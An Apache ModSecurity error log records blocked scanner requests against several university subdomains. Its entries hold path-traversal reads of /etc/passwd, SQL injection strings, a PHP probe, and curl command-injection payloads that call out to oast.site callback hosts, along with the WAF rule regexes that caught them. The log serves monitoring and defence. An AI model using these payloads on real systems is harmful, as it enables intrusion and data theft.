[Tue Aug 29 11:30:58.451816 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPPS0AAAAAd"]
[Tue Aug 29 11:30:58.491810 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPPS0EAAAAd"]
[Tue Aug 29 11:30:58.499373 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPDn3QAAAAP"]
[Tue Aug 29 11:30:58.518678 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAN@5CEAAAAO"]
[Tue Aug 29 11:30:58.544579 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPPS0MAAAAd"]
[Tue Aug 29 11:30:58.546489 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAP05IQAAAAA"]
[Tue Aug 29 11:30:59.315760 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgswkbs3jkjz7a7.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAO87-sAAAAF"]
[Tue Aug 29 11:30:59.316688 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlg8z1m1rs6zoxr4.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAP05IUAAAAA"]
[Tue Aug 29 11:30:59.316707 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgosaiz76ce776p.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAPRNe0AAAAf"]
[Tue Aug 29 11:30:59.359029 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAOM4b4AAAAU"]
[Tue Aug 29 11:30:59.398942 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAPMmF0AAAAY"]
[Tue Aug 29 11:30:59.428099 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgsmjgeswfdnj9z.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAOM4cEAAAAU"]
[Tue Aug 29 11:30:59.492032 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10g8Co-f0AAAOKNtsAAAAK"]
[Tue Aug 29 11:30:59.526306 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10g8Co-f0AAAOM4cMAAAAU"]
[Tue Aug 29 11:30:59.545154 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAN@5CcAAAAO"]
[Tue Aug 29 11:30:59.548977 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlga6yrr7xe9myjb.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAOKNtwAAAAK"]
[Tue Aug 29 11:30:59.570611 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAOKNt0AAAAK"]
[Tue Aug 29 11:31:00.305146 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgu4f76dwh99f9s.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10hMCo-f0AAAO87-8AAAAF"]
[Tue Aug 29 11:31:00.333650 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10hMCo-f0AAAO88AAAAAAF"]
[Tue Aug 29 11:31:00.341685 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10hMCo-f0AAAPOhd0AAAAa"]
[Tue Aug 29 11:31:01.478673 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10hcCo-f0AAAOM4csAAAAU"]
[Tue Aug 29 11:31:01.609209 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAP05JIAAAAA"]
[Tue Aug 29 11:31:01.643999 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAP05JMAAAAA"]
[Tue Aug 29 11:31:01.682096 2023] [:error] [pid 1015] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAP3Ol8AAAAH"]
[Tue Aug 29 11:31:02.715451 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10hsCo-f0AAAP5mGQAAAAM"]
[Tue Aug 29 11:31:02.742380 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgej5xqi86bur5r.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10hsCo-f0AAAP4H8wAAAAI"]
[Tue Aug 29 11:31:03.702668 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlg4nmn8gd64z3pk.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP9HewAAAAW"]
[Tue Aug 29 11:31:03.776522 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlg3s8ggf5zehwwz.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP9He0AAAAW"]
[Tue Aug 29 11:31:03.835213 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlg8kwb6nprskgwz.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP4H9QAAAAI"]
[Tue Aug 29 11:31:03.877715 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10h8Co-f0AAAP9HfAAAAAW"]
[Tue Aug 29 11:31:03.909447 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgg96kepqj1n6e7.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP4H9cAAAAI"]
[Tue Aug 29 11:31:04.497510 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgyj51onz7aa9w4.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10iMCo-f0AAAP7dW4AAAAR"]
[Tue Aug 29 11:31:04.518806 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10iMCo-f0AAAP7dW8AAAAR"]
[Tue Aug 29 11:31:04.642541 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlg4z49qdeojzff4.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP9HfIAAAAW"]
